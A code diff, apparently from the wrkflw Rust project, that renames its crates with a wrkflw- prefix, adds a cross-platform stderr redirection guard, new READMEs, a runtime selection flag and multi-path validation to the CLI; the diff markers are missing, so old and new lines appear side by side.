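`with_stderr_to_null` is a thin wrapper around the `RedirectedStderr` RAII guard, which can also be held directly when the region to silence does not fit neatly into a closure. A minimal sketch of that usage (the guard restores stderr on drop; on Windows it is a no-op, as the module docs note — `probe_runtime` is a hypothetical caller shown only for illustration):

```rust
use wrkflw_utils::fd::RedirectedStderr;

// Hypothetical caller shown for illustration.
fn probe_runtime() -> bool {
    // Stderr stays redirected to /dev/null (on Unix) while `_guard` is alive.
    let _guard = RedirectedStderr::to_null().expect("failed to redirect stderr");
    eprintln!("suppressed on Unix");
    true
} // `_guard` is dropped here and the original stderr is restored.
```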
@@ -35,78 +35,145 @@ pub fn is_workflow_file(path: &Path) -> bool {
}

/// Module for safely handling file descriptor redirection
///
/// On Unix systems (Linux, macOS), this module provides true file descriptor
/// redirection by duplicating stderr and redirecting it to /dev/null.
///
/// On Windows systems, the redirection functionality is limited due to platform
/// differences in file descriptor handling. The functions will execute without
/// error but stderr may not be fully suppressed.
pub mod fd {
    use nix::fcntl::{open, OFlag};
    use nix::sys::stat::Mode;
    use nix::unistd::{close, dup, dup2};
    use std::io::{self, Result};
    use std::os::unix::io::RawFd;
    use std::path::Path;

    /// Standard file descriptors
    const STDERR_FILENO: RawFd = 2;
    use std::io::Result;

    /// Represents a redirected stderr that can be restored
    pub struct RedirectedStderr {
        original_fd: Option<RawFd>,
        null_fd: Option<RawFd>,
        #[cfg(unix)]
        original_fd: Option<std::os::unix::io::RawFd>,
        #[cfg(unix)]
        null_fd: Option<std::os::unix::io::RawFd>,
        #[cfg(windows)]
        _phantom: std::marker::PhantomData<()>,
    }

    impl RedirectedStderr {
        /// Creates a new RedirectedStderr that redirects stderr to /dev/null
        pub fn to_null() -> Result<Self> {
            // Duplicate the current stderr fd
            let stderr_backup = match dup(STDERR_FILENO) {
                Ok(fd) => fd,
                Err(e) => return Err(io::Error::other(e)),
            };
    #[cfg(unix)]
    mod unix_impl {
        use super::*;
        use nix::fcntl::{open, OFlag};
        use nix::sys::stat::Mode;
        use nix::unistd::{close, dup, dup2};
        use std::io;
        use std::os::unix::io::RawFd;
        use std::path::Path;

            // Open /dev/null
            let null_fd = match open(Path::new("/dev/null"), OFlag::O_WRONLY, Mode::empty()) {
                Ok(fd) => fd,
                Err(e) => {
        /// Standard file descriptors
        const STDERR_FILENO: RawFd = 2;

        impl RedirectedStderr {
            /// Creates a new RedirectedStderr that redirects stderr to /dev/null
            pub fn to_null() -> Result<Self> {
                // Duplicate the current stderr fd
                let stderr_backup = match dup(STDERR_FILENO) {
                    Ok(fd) => fd,
                    Err(e) => return Err(io::Error::other(e)),
                };

                // Open /dev/null
                let null_fd = match open(Path::new("/dev/null"), OFlag::O_WRONLY, Mode::empty()) {
                    Ok(fd) => fd,
                    Err(e) => {
                        let _ = close(stderr_backup); // Clean up on error
                        return Err(io::Error::other(e));
                    }
                };

                // Redirect stderr to /dev/null
                if let Err(e) = dup2(null_fd, STDERR_FILENO) {
                    let _ = close(stderr_backup); // Clean up on error
                    let _ = close(null_fd);
                    return Err(io::Error::other(e));
                }
            };

            // Redirect stderr to /dev/null
            if let Err(e) = dup2(null_fd, STDERR_FILENO) {
                let _ = close(stderr_backup); // Clean up on error
                let _ = close(null_fd);
                return Err(io::Error::other(e));

                Ok(RedirectedStderr {
                    original_fd: Some(stderr_backup),
                    null_fd: Some(null_fd),
                })
            }

            Ok(RedirectedStderr {
                original_fd: Some(stderr_backup),
                null_fd: Some(null_fd),
            })
        }
    }

    impl Drop for RedirectedStderr {
        /// Automatically restores stderr when the RedirectedStderr is dropped
        fn drop(&mut self) {
            if let Some(orig_fd) = self.original_fd.take() {
                // Restore the original stderr
                let _ = dup2(orig_fd, STDERR_FILENO);
                let _ = close(orig_fd);
            }
        impl Drop for RedirectedStderr {
            /// Automatically restores stderr when the RedirectedStderr is dropped
            fn drop(&mut self) {
                if let Some(orig_fd) = self.original_fd.take() {
                    // Restore the original stderr
                    let _ = dup2(orig_fd, STDERR_FILENO);
                    let _ = close(orig_fd);
                }

            // Close the null fd
            if let Some(null_fd) = self.null_fd.take() {
                let _ = close(null_fd);
                // Close the null fd
                if let Some(null_fd) = self.null_fd.take() {
                    let _ = close(null_fd);
                }
            }
        }
    }

    /// Run a function with stderr redirected to /dev/null, then restore stderr
    #[cfg(windows)]
    mod windows_impl {
        use super::*;

        impl RedirectedStderr {
            /// Creates a new RedirectedStderr that redirects stderr to NUL on Windows
            pub fn to_null() -> Result<Self> {
                // On Windows, we can't easily redirect stderr at the file descriptor level
                // like we can on Unix systems. This is a simplified implementation that
                // doesn't actually redirect but provides the same interface.
                // The actual stderr suppression will need to be handled differently on Windows.
                Ok(RedirectedStderr {
                    _phantom: std::marker::PhantomData,
                })
            }
        }

        impl Drop for RedirectedStderr {
            /// No-op drop implementation for Windows
            fn drop(&mut self) {
                // Nothing to restore on Windows in this simplified implementation
            }
        }
    }

    /// Run a function with stderr redirected to /dev/null (Unix) or suppressed (Windows), then restore stderr
    ///
    /// # Platform Support
    /// - **Unix (Linux, macOS)**: Fully supported - stderr is redirected to /dev/null
    /// - **Windows**: Limited support - function executes but stderr may be visible
    ///
    /// # Example
    /// ```
    /// use wrkflw_utils::fd::with_stderr_to_null;
    ///
    /// let result = with_stderr_to_null(|| {
    ///     eprintln!("This will be hidden on Unix");
    ///     42
    /// }).unwrap();
    /// assert_eq!(result, 42);
    /// ```
    pub fn with_stderr_to_null<F, T>(f: F) -> Result<T>
    where
        F: FnOnce() -> T,
    {
        let _redirected = RedirectedStderr::to_null()?;
        Ok(f())
        #[cfg(unix)]
        {
            let _redirected = RedirectedStderr::to_null()?;
            Ok(f())
        }
        #[cfg(windows)]
        {
            // On Windows, we can't easily redirect stderr at the FD level,
            // so we just run the function without redirection.
            // This means stderr won't be suppressed on Windows, but the function will work.
            Ok(f())
        }
    }
}

@@ -116,15 +183,16 @@ mod tests {

    #[test]
    fn test_fd_redirection() {
        // This test will write to stderr, which should be redirected
        // This test will write to stderr, which should be redirected on Unix
        // On Windows, it will just run normally without redirection
        let result = fd::with_stderr_to_null(|| {
            // This would normally appear in stderr
            eprintln!("This should be redirected to /dev/null");
            // This would normally appear in stderr (suppressed on Unix, visible on Windows)
            eprintln!("This should be redirected to /dev/null on Unix");
            // Return a test value to verify the function passes through the result
            42
        });

        // The function should succeed and return our test value
        // The function should succeed and return our test value on both platforms
        assert!(result.is_ok());
        assert_eq!(result.unwrap(), 42);
    }
@@ -1,14 +1,19 @@
[package]
name = "validators"
name = "wrkflw-validators"
version.workspace = true
edition.workspace = true
description = "validation functionality for wrkflw"
description = "Workflow validation functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true

[dependencies]
# Internal crates
models = { path = "../models" }
matrix = { path = "../matrix" }
wrkflw-models.workspace = true
wrkflw-matrix.workspace = true

# External dependencies
serde.workspace = true
crates/validators/README.md
Normal file
29
crates/validators/README.md
Normal file
@@ -0,0 +1,29 @@
|
||||
## wrkflw-validators
|
||||
|
||||
Validation utilities for workflows and steps.
|
||||
|
||||
- Validates GitHub Actions sections: jobs, steps, actions references, triggers
|
||||
- GitLab pipeline validation helpers
|
||||
- Matrix-specific validation
|
||||
|
||||
### Example
|
||||
|
||||
```rust
|
||||
use serde_yaml::Value;
|
||||
use wrkflw_models::ValidationResult;
|
||||
use wrkflw_validators::{validate_jobs, validate_triggers};
|
||||
|
||||
let yaml: Value = serde_yaml::from_str(r#"name: demo
|
||||
on: [workflow_dispatch]
|
||||
jobs: { build: { runs-on: ubuntu-latest, steps: [] } }
|
||||
"#).unwrap();
|
||||
|
||||
let mut res = ValidationResult::new();
|
||||
if let Some(on) = yaml.get("on") {
|
||||
validate_triggers(on, &mut res);
|
||||
}
|
||||
if let Some(jobs) = yaml.get("jobs") {
|
||||
validate_jobs(jobs, &mut res);
|
||||
}
|
||||
assert!(res.is_valid);
|
||||
```
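
The GitLab helpers follow the same pattern through `validate_gitlab_pipeline`, which takes a typed `wrkflw_models::gitlab::Pipeline` and returns a `ValidationResult`. A sketch, under the assumption that `Pipeline` can be deserialized straight from pipeline YAML (in practice the parser crate is the authoritative entry point):

```rust
use wrkflw_models::gitlab::Pipeline;
use wrkflw_validators::validate_gitlab_pipeline;

// Assumption: Pipeline implements serde::Deserialize for plain pipeline YAML;
// if in doubt, construct it via wrkflw-parser instead.
let pipeline: Pipeline = serde_yaml::from_str(r#"
build:
  script:
    - cargo build --release
"#).unwrap();

let result = validate_gitlab_pipeline(&pipeline);
assert!(result.is_valid);
```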

@@ -1,4 +1,4 @@
use models::ValidationResult;
use wrkflw_models::ValidationResult;

pub fn validate_action_reference(
    action_ref: &str,

@@ -1,6 +1,6 @@
use models::gitlab::{Job, Pipeline};
use models::ValidationResult;
use std::collections::HashMap;
use wrkflw_models::gitlab::{Job, Pipeline};
use wrkflw_models::ValidationResult;

/// Validate a GitLab CI/CD pipeline
pub fn validate_gitlab_pipeline(pipeline: &Pipeline) -> ValidationResult {
@@ -65,7 +65,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
    // Check retry configuration
    if let Some(retry) = &job.retry {
        match retry {
            models::gitlab::Retry::MaxAttempts(attempts) => {
            wrkflw_models::gitlab::Retry::MaxAttempts(attempts) => {
                if *attempts > 10 {
                    result.add_issue(format!(
                        "Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",
@@ -73,7 +73,7 @@ fn validate_jobs(jobs: &HashMap<String, Job>, result: &mut ValidationResult) {
                    ));
                }
            }
            models::gitlab::Retry::Detailed { max, when: _ } => {
            wrkflw_models::gitlab::Retry::Detailed { max, when: _ } => {
                if *max > 10 {
                    result.add_issue(format!(
                        "Job '{}' has excessive retry count: {}. Consider reducing to avoid resource waste",

@@ -1,6 +1,6 @@
use crate::{validate_matrix, validate_steps};
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;

pub fn validate_jobs(jobs: &Value, result: &mut ValidationResult) {
    if let Value::Mapping(jobs_map) = jobs {

@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;

pub fn validate_matrix(matrix: &Value, result: &mut ValidationResult) {
    // Check if matrix is a mapping

@@ -1,7 +1,7 @@
use crate::validate_action_reference;
use models::ValidationResult;
use serde_yaml::Value;
use std::collections::HashSet;
use wrkflw_models::ValidationResult;

pub fn validate_steps(steps: &[Value], job_name: &str, result: &mut ValidationResult) {
    let mut step_ids: HashSet<String> = HashSet::new();

@@ -1,5 +1,5 @@
use models::ValidationResult;
use serde_yaml::Value;
use wrkflw_models::ValidationResult;

pub fn validate_triggers(on: &Value, result: &mut ValidationResult) {
    let valid_events = vec![
@@ -12,18 +12,18 @@ license.workspace = true

[dependencies]
# Workspace crates
models = { path = "../models" }
executor = { path = "../executor" }
github = { path = "../github" }
gitlab = { path = "../gitlab" }
logging = { path = "../logging" }
matrix = { path = "../matrix" }
parser = { path = "../parser" }
runtime = { path = "../runtime" }
ui = { path = "../ui" }
utils = { path = "../utils" }
validators = { path = "../validators" }
evaluator = { path = "../evaluator" }
wrkflw-models.workspace = true
wrkflw-executor.workspace = true
wrkflw-github.workspace = true
wrkflw-gitlab.workspace = true
wrkflw-logging.workspace = true
wrkflw-matrix.workspace = true
wrkflw-parser.workspace = true
wrkflw-runtime.workspace = true
wrkflw-ui.workspace = true
wrkflw-utils.workspace = true
wrkflw-validators.workspace = true
wrkflw-evaluator.workspace = true

# External dependencies
clap.workspace = true
@@ -62,4 +62,4 @@ path = "src/lib.rs"

[[bin]]
name = "wrkflw"
path = "src/main.rs"
path = "src/main.rs"
112
crates/wrkflw/README.md
Normal file
@@ -0,0 +1,112 @@
## WRKFLW (CLI and Library)

This crate provides the `wrkflw` command-line interface and a thin library surface that ties together all WRKFLW subcrates. It lets you validate and execute GitHub Actions workflows and GitLab CI pipelines locally, with a built-in TUI for an interactive experience.

- **Validate**: Lints structure and common mistakes in workflow/pipeline files
- **Run**: Executes jobs locally using Docker, Podman, or emulation (no containers)
- **TUI**: Interactive terminal UI for browsing workflows, running, and viewing logs
- **Trigger**: Manually trigger remote runs on GitHub/GitLab

### Installation

```bash
cargo install wrkflw
```

### Quick start

```bash
# Launch the TUI (auto-loads .github/workflows)
wrkflw

# Validate all workflows in the default directory
wrkflw validate

# Validate a specific file or directory
wrkflw validate .github/workflows/ci.yml
wrkflw validate path/to/workflows

# Validate multiple files and/or directories
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows

# Run a workflow (Docker by default)
wrkflw run .github/workflows/ci.yml

# Use Podman or emulation instead of Docker
wrkflw run --runtime podman .github/workflows/ci.yml
wrkflw run --runtime emulation .github/workflows/ci.yml

# Open the TUI explicitly
wrkflw tui
wrkflw tui --runtime podman
```

### Commands

- **validate**: Validate workflow/pipeline files and/or directories
  - GitHub (default): `.github/workflows/*.yml`
  - GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
  - Accepts multiple paths in a single invocation
  - Exit code behavior (by default): `1` when any validation failure is detected
  - Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`

- **run**: Execute a workflow or pipeline locally
  - Runtimes: `docker` (default), `podman`, `emulation`
  - Flags: `--runtime`, `--preserve-containers-on-failure`, `--gitlab`, `--verbose`

- **tui**: Interactive terminal interface
  - Browse workflows, execute, and inspect logs and job details

- **trigger**: Trigger a GitHub workflow (requires `GITHUB_TOKEN`)
- **trigger-gitlab**: Trigger a GitLab pipeline (requires `GITLAB_TOKEN`)
- **list**: Show detected workflows and pipelines in the repo

### Environment variables

- **GITHUB_TOKEN**: Required for `trigger` when calling GitHub
- **GITLAB_TOKEN**: Required for `trigger-gitlab` (api scope)

### Exit codes

- `validate`: `0` if all pass; `1` if any fail (unless `--no-exit-code`); see the snippet below
- `run`: `0` on success, `1` if execution fails
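
Because failures surface through the exit status, `validate` composes directly with shell logic; for example, as a pre-push guard:

```bash
# Abort a push when any workflow file fails validation
if ! wrkflw validate .github/workflows; then
  echo "fix workflow errors before pushing" >&2
  exit 1
fi
```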

### Library usage

This crate re-exports subcrates for convenience if you want to embed functionality:

```rust
use std::path::Path;
use wrkflw::executor::{execute_workflow, ExecutionConfig, RuntimeType};

# tokio_test::block_on(async {
let cfg = ExecutionConfig {
    runtime_type: RuntimeType::Docker,
    verbose: true,
    preserve_containers_on_failure: false,
};
let result = execute_workflow(Path::new(".github/workflows/ci.yml"), cfg).await?;
println!("status: {:?}", result.summary_status);
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

You can also run the TUI programmatically:

```rust
use std::path::PathBuf;
use wrkflw::executor::RuntimeType;
use wrkflw::ui::run_wrkflw_tui;

# tokio_test::block_on(async {
let path = PathBuf::from(".github/workflows");
run_wrkflw_tui(Some(&path), RuntimeType::Docker, true, false).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```

### Notes

- See the repository root README for feature details, limitations, and a full walkthrough.
- Service containers and advanced Actions features are best supported in Docker/Podman modes.
- Emulation mode skips containerized steps and runs commands on the host.
@@ -1,12 +1,12 @@
pub use evaluator;
pub use executor;
pub use github;
pub use gitlab;
pub use logging;
pub use matrix;
pub use models;
pub use parser;
pub use runtime;
pub use ui;
pub use utils;
pub use validators;
pub use wrkflw_evaluator as evaluator;
pub use wrkflw_executor as executor;
pub use wrkflw_github as github;
pub use wrkflw_gitlab as gitlab;
pub use wrkflw_logging as logging;
pub use wrkflw_matrix as matrix;
pub use wrkflw_models as models;
pub use wrkflw_parser as parser;
pub use wrkflw_runtime as runtime;
pub use wrkflw_ui as ui;
pub use wrkflw_utils as utils;
pub use wrkflw_validators as validators;
@@ -1,15 +1,38 @@
use bollard::Docker;
use clap::{Parser, Subcommand};
use clap::{Parser, Subcommand, ValueEnum};
use std::collections::HashMap;
use std::path::Path;
use std::path::PathBuf;

#[derive(Debug, Clone, ValueEnum)]
enum RuntimeChoice {
    /// Use Docker containers for isolation
    Docker,
    /// Use Podman containers for isolation
    Podman,
    /// Use process emulation mode (no containers, UNSAFE)
    Emulation,
    /// Use secure emulation mode with sandboxing (recommended for untrusted code)
    SecureEmulation,
}

impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
    fn from(choice: RuntimeChoice) -> Self {
        match choice {
            RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
            RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
            RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
            RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
        }
    }
}

#[derive(Debug, Parser)]
#[command(
    name = "wrkflw",
    about = "GitHub & GitLab CI/CD validator and executor",
    version,
    long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --emulate .github/workflows/build.yml # Use emulation mode instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
    long_about = "A CI/CD validator and executor that runs workflows locally.\n\nExamples:\n wrkflw validate # Validate all workflows in .github/workflows\n wrkflw run .github/workflows/build.yml # Run a specific workflow\n wrkflw run .gitlab-ci.yml # Run a GitLab CI pipeline\n wrkflw --verbose run .github/workflows/build.yml # Run with more output\n wrkflw --debug run .github/workflows/build.yml # Run with detailed debug information\n wrkflw run --runtime emulation .github/workflows/build.yml # Use emulation mode instead of containers\n wrkflw run --runtime podman .github/workflows/build.yml # Use Podman instead of Docker\n wrkflw run --preserve-containers-on-failure .github/workflows/build.yml # Keep failed containers for debugging"
)]
struct Wrkflw {
    #[command(subcommand)]
@@ -28,8 +51,9 @@ struct Wrkflw {
enum Commands {
    /// Validate workflow or pipeline files
    Validate {
        /// Path to workflow/pipeline file or directory (defaults to .github/workflows)
        path: Option<PathBuf>,
        /// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
        #[arg(value_name = "path", num_args = 0..)]
        paths: Vec<PathBuf>,

        /// Explicitly validate as GitLab CI/CD pipeline
        #[arg(long)]
@@ -49,9 +73,9 @@ enum Commands {
        /// Path to workflow/pipeline file to execute
        path: PathBuf,

        /// Use emulation mode instead of Docker
        #[arg(short, long)]
        emulate: bool,
        /// Container runtime to use (docker, podman, emulation, secure-emulation)
        #[arg(short, long, value_enum, default_value = "docker")]
        runtime: RuntimeChoice,

        /// Show 'Would execute GitHub action' messages in emulation mode
        #[arg(long, default_value_t = false)]
@@ -71,9 +95,9 @@ enum Commands {
        /// Path to workflow file or directory (defaults to .github/workflows)
        path: Option<PathBuf>,

        /// Use emulation mode instead of Docker
        #[arg(short, long)]
        emulate: bool,
        /// Container runtime to use (docker, podman, emulation, secure-emulation)
        #[arg(short, long, value_enum, default_value = "docker")]
        runtime: RuntimeChoice,

        /// Show 'Would execute GitHub action' messages in emulation mode
        #[arg(long, default_value_t = false)]
@@ -123,7 +147,7 @@ fn parse_key_val(s: &str) -> Result<(String, String), String> {
}

// Make this function public for testing? Or move to a utils/cleanup mod?
// Or call executor::cleanup and runtime::cleanup directly?
// Or call wrkflw_executor::cleanup and wrkflw_runtime::cleanup directly?
// Let's try calling them directly for now.
async fn cleanup_on_exit() {
    // Clean up Docker resources if available, but don't let it block indefinitely
@@ -131,35 +155,35 @@ async fn cleanup_on_exit() {
        match Docker::connect_with_local_defaults() {
            Ok(docker) => {
                // Assuming cleanup_resources exists in executor crate
                executor::cleanup_resources(&docker).await;
                wrkflw_executor::cleanup_resources(&docker).await;
            }
            Err(_) => {
                // Docker not available
                logging::info("Docker not available, skipping Docker cleanup");
                wrkflw_logging::info("Docker not available, skipping Docker cleanup");
            }
        }
    })
    .await
    {
        Ok(_) => logging::debug("Docker cleanup completed successfully"),
        Err(_) => {
            logging::warning("Docker cleanup timed out after 3 seconds, continuing with shutdown")
        }
        Ok(_) => wrkflw_logging::debug("Docker cleanup completed successfully"),
        Err(_) => wrkflw_logging::warning(
            "Docker cleanup timed out after 3 seconds, continuing with shutdown",
        ),
    }

    // Always clean up emulation resources
    match tokio::time::timeout(
        std::time::Duration::from_secs(2),
        // Assuming cleanup_resources exists in runtime::emulation module
        runtime::emulation::cleanup_resources(),
        // Assuming cleanup_resources exists in wrkflw_runtime::emulation module
        wrkflw_runtime::emulation::cleanup_resources(),
    )
    .await
    {
        Ok(_) => logging::debug("Emulation cleanup completed successfully"),
        Err(_) => logging::warning("Emulation cleanup timed out, continuing with shutdown"),
        Ok(_) => wrkflw_logging::debug("Emulation cleanup completed successfully"),
        Err(_) => wrkflw_logging::warning("Emulation cleanup timed out, continuing with shutdown"),
    }

    logging::info("Resource cleanup completed");
    wrkflw_logging::info("Resource cleanup completed");
}

async fn handle_signals() {
@@ -187,7 +211,7 @@ async fn handle_signals() {
            "Cleanup taking too long (over {} seconds), forcing exit...",
            hard_exit_time.as_secs()
        );
        logging::error("Forced exit due to cleanup timeout");
        wrkflw_logging::error("Forced exit due to cleanup timeout");
        std::process::exit(1);
    });

@@ -246,19 +270,41 @@ fn is_gitlab_pipeline(path: &Path) -> bool {

#[tokio::main]
async fn main() {
    // Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
    let default_panic_hook = std::panic::take_hook();
    std::panic::set_hook(Box::new(move |info| {
        let mut is_broken_pipe = false;
        if let Some(s) = info.payload().downcast_ref::<&str>() {
            if s.contains("Broken pipe") {
                is_broken_pipe = true;
            }
        }
        if let Some(s) = info.payload().downcast_ref::<String>() {
            if s.contains("Broken pipe") {
                is_broken_pipe = true;
            }
        }
        if is_broken_pipe {
            // Treat as a successful, short-circuited exit
            std::process::exit(0);
        }
        // Fall back to the default hook for all other panics
        default_panic_hook(info);
    }));

    let cli = Wrkflw::parse();
    let verbose = cli.verbose;
    let debug = cli.debug;

    // Set log level based on command line flags
    if debug {
        logging::set_log_level(logging::LogLevel::Debug);
        logging::debug("Debug mode enabled - showing detailed logs");
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Debug);
        wrkflw_logging::debug("Debug mode enabled - showing detailed logs");
    } else if verbose {
        logging::set_log_level(logging::LogLevel::Info);
        logging::info("Verbose mode enabled");
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Info);
        wrkflw_logging::info("Verbose mode enabled");
    } else {
        logging::set_log_level(logging::LogLevel::Warning);
        wrkflw_logging::set_log_level(wrkflw_logging::LogLevel::Warning);
    }

    // Setup a Ctrl+C handler that runs in the background
@@ -266,65 +312,78 @@ async fn main() {

    match &cli.command {
        Some(Commands::Validate {
|
||||
path,
|
||||
paths,
|
||||
gitlab,
|
||||
exit_code,
|
||||
no_exit_code,
|
||||
}) => {
|
||||
// Determine the path to validate
|
||||
let validate_path = path
|
||||
.clone()
|
||||
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
|
||||
|
||||
// Check if the path exists
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
std::process::exit(1);
|
||||
}
|
||||
// Determine the paths to validate (default to .github/workflows when none provided)
|
||||
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
|
||||
vec![PathBuf::from(".github/workflows")]
|
||||
} else {
|
||||
paths.clone()
|
||||
};
|
||||
|
||||
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
|
||||
let force_gitlab = *gitlab;
|
||||
let mut validation_failed = false;
|
||||
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
for validate_path in validate_paths {
|
||||
// Check if the path exists; if not, mark failure but continue
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
validation_failed = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
println!("Validating {} workflow file(s)...", entries.len());
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
println!(
|
||||
"Validating {} workflow file(s) in {}...",
|
||||
entries.len(),
|
||||
validate_path.display()
|
||||
);
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
validation_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
}
|
||||
|
||||
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
|
||||
@@ -334,20 +393,17 @@ async fn main() {
|
||||
}
|
||||
Some(Commands::Run {
|
||||
path,
|
||||
emulate,
|
||||
runtime,
|
||||
show_action_messages: _,
|
||||
preserve_containers_on_failure,
|
||||
gitlab,
|
||||
}) => {
|
||||
// Create execution configuration
|
||||
let config = executor::ExecutionConfig {
|
||||
runtime_type: if *emulate {
|
||||
executor::RuntimeType::Emulation
|
||||
} else {
|
||||
executor::RuntimeType::Docker
|
||||
},
|
||||
let config = wrkflw_executor::ExecutionConfig {
|
||||
runtime_type: runtime.clone().into(),
|
||||
verbose,
|
||||
preserve_containers_on_failure: *preserve_containers_on_failure,
|
||||
secrets_config: None, // Use default secrets configuration
|
||||
};
|
||||
|
||||
// Check if we're explicitly or implicitly running a GitLab pipeline
|
||||
@@ -358,10 +414,10 @@ async fn main() {
|
||||
"GitHub workflow"
|
||||
};
|
||||
|
||||
logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
|
||||
wrkflw_logging::info(&format!("Running {} at: {}", workflow_type, path.display()));
|
||||
|
||||
// Execute the workflow
|
||||
let result = executor::execute_workflow(path, config)
|
||||
let result = wrkflw_executor::execute_workflow(path, config)
|
||||
.await
|
||||
.unwrap_or_else(|e| {
|
||||
eprintln!("Error executing workflow: {}", e);
|
||||
@@ -403,15 +459,15 @@ async fn main() {
|
||||
println!(
|
||||
" {} {} ({})",
|
||||
match job.status {
|
||||
executor::JobStatus::Success => "✅",
|
||||
executor::JobStatus::Failure => "❌",
|
||||
executor::JobStatus::Skipped => "⏭️",
|
||||
wrkflw_executor::JobStatus::Success => "✅",
|
||||
wrkflw_executor::JobStatus::Failure => "❌",
|
||||
wrkflw_executor::JobStatus::Skipped => "⏭️",
|
||||
},
|
||||
job.name,
|
||||
match job.status {
|
||||
executor::JobStatus::Success => "success",
|
||||
executor::JobStatus::Failure => "failure",
|
||||
executor::JobStatus::Skipped => "skipped",
|
||||
wrkflw_executor::JobStatus::Success => "success",
|
||||
wrkflw_executor::JobStatus::Failure => "failure",
|
||||
wrkflw_executor::JobStatus::Skipped => "skipped",
|
||||
}
|
||||
);
|
||||
|
||||
@@ -419,15 +475,15 @@ async fn main() {
|
||||
println!(" Steps:");
|
||||
for step in job.steps {
|
||||
let step_status = match step.status {
|
||||
executor::StepStatus::Success => "✅",
|
||||
executor::StepStatus::Failure => "❌",
|
||||
executor::StepStatus::Skipped => "⏭️",
|
||||
wrkflw_executor::StepStatus::Success => "✅",
|
||||
wrkflw_executor::StepStatus::Failure => "❌",
|
||||
wrkflw_executor::StepStatus::Skipped => "⏭️",
|
||||
};
|
||||
|
||||
println!(" {} {}", step_status, step.name);
|
||||
|
||||
// If step failed and we're not in verbose mode, show condensed error info
|
||||
if step.status == executor::StepStatus::Failure && !verbose {
|
||||
if step.status == wrkflw_executor::StepStatus::Failure && !verbose {
|
||||
// Extract error information from step output
|
||||
let error_lines = step
|
||||
.output
|
||||
@@ -466,26 +522,22 @@ async fn main() {
|
||||
.map(|v| v.iter().cloned().collect::<HashMap<String, String>>());
|
||||
|
||||
// Trigger the pipeline
|
||||
if let Err(e) = gitlab::trigger_pipeline(branch.as_deref(), variables).await {
|
||||
if let Err(e) = wrkflw_gitlab::trigger_pipeline(branch.as_deref(), variables).await {
|
||||
